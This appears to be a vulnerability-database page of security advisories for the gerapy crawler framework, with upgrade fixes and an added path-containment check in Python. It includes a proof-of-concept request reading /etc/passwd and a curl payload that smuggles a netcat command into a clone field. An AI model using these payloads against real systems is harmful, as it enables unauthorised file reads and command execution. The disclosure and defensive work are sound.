gerapy@0.8.5rc2 vulnerabilities

Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js.

  • latest version

    0.9.13

  • latest non vulnerable version

  • first published

    7 years ago

  • latest version published

    1 year ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the gerapy package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability | Vulnerable Version
    • M
    Arbitrary File Read

    gerapy is a Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js.

    Affected versions of this package are vulnerable to Arbitrary File Read. An authenticated user without permissions can send a specially crafted HTTP POST request to the server hosting gerapy in order to retrieve the contents of arbitrary files.

    PoC

       POST /api/project/file/read HTTP/1.1
       Host:
       Content-Length: 35
       Accept: application/json, text/plain, */*
       Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0
       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
       Content-Type: application/json;charset=UTF-8
       Accept-Encoding: gzip, deflate
       Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
       Connection: close

       {"path":"/etc/","label":"passwd"}


    How to fix Arbitrary File Read?

    Upgrade gerapy to version 0.9.9 or higher.

    [,0.9.9)
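    A containment check of the kind that closes this class of bug, written here as an added example (not gerapy's code): the request's `path` and `label` fields are joined under a fixed projects root and the resolved target must stay inside it. The projects root is a constructed value and the function names are hypothetical.

```python
import os
from pathlib import Path

# Constructed example root; a real deployment uses the directory its projects live in.
PROJECTS_ROOT = "/var/lib/gerapy_projects"


def resolve_project_file(project_root: str, path: str, label: str) -> Path:
    """Resolve a {"path": ..., "label": ...} read request to a file under project_root.

    Raises ValueError when the request would land outside the root. This is a
    hypothetical defensive check, not gerapy's own implementation.
    """
    if not label:
        raise ValueError("label is required")
    root = Path(project_root).resolve()
    # Path joining discards everything before an absolute component, so
    # "/etc/" + "passwd" would silently replace the project root. Refuse absolute parts.
    if os.path.isabs(path) or os.path.isabs(label):
        raise ValueError("absolute path component rejected")
    # resolve() collapses ".." and follows symlinks, so the containment test below
    # sees the real target rather than the textual path.
    candidate = (root / path / label).resolve()
    if candidate != root and root not in candidate.parents:
        raise ValueError("path escapes project root")
    return candidate


def is_read_allowed(body: dict, project_root: str = PROJECTS_ROOT) -> bool:
    """Return True only if the request body names a file inside the project root."""
    try:
        resolve_project_file(project_root, str(body.get("path", "")), str(body.get("label", "")))
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    # The request body from the PoC above must be refused.
    print(is_read_allowed({"path": "/etc/", "label": "passwd"}))  # False
    # Traversal with ".." resolves outside the root and is refused as well.
    print(is_read_allowed({"path": "../../etc", "label": "passwd"}))  # False
    # A file inside a project stays readable.
    print(is_read_allowed({"path": "demo/demo", "label": "settings.py"}))  # True
```

    The path check complements, and does not replace, the permission check the advisory points at: the endpoint should also verify that the authenticated user is allowed to read the project in question.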
    • H
    Access Restriction Bypass

    gerapy is a Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js.

    Affected versions of this package are vulnerable to Access Restriction Bypass. An authenticated user can execute arbitrary commands in Gerapy.

    PoC

    $ curl 'http://127.0.0.1:8000/api/project/clone' \
      -H 'Accept: application/json, text/plain, */*' \
      -H 'Content-Type: application/json;charset=UTF-8' \
      -H 'Authorization: Token $token' \
      --data-raw '{"address":"http;echo hi | nc 127.0.0.1 7777;"}'

    $ nc -lvp 7777
    hi


    How to fix Access Restriction Bypass?

    Upgrade gerapy to version 0.9.9 or higher.

    [,0.9.9)
    • C
    Arbitrary Code Execution

    gerapy is a Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js.

    Affected versions of this package are vulnerable to Arbitrary Code Execution via the project_configure function, by sending HTTP requests that contain malicious code.

    Note: CVE-2021-44597 is a duplicate of CVE-2021-43857.

    How to fix Arbitrary Code Execution?

    Upgrade gerapy to version 0.9.8 or higher.

    [,0.9.8)
    • H
    Command Injection

    gerapy is a Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js.

    Affected versions of this package are vulnerable to Command Injection. The input being passed to Popen, via the project_configure endpoint, isn’t being sanitized.

    How to fix Command Injection?

    Upgrade gerapy to version 0.9.3 or higher.

    [,0.9.3)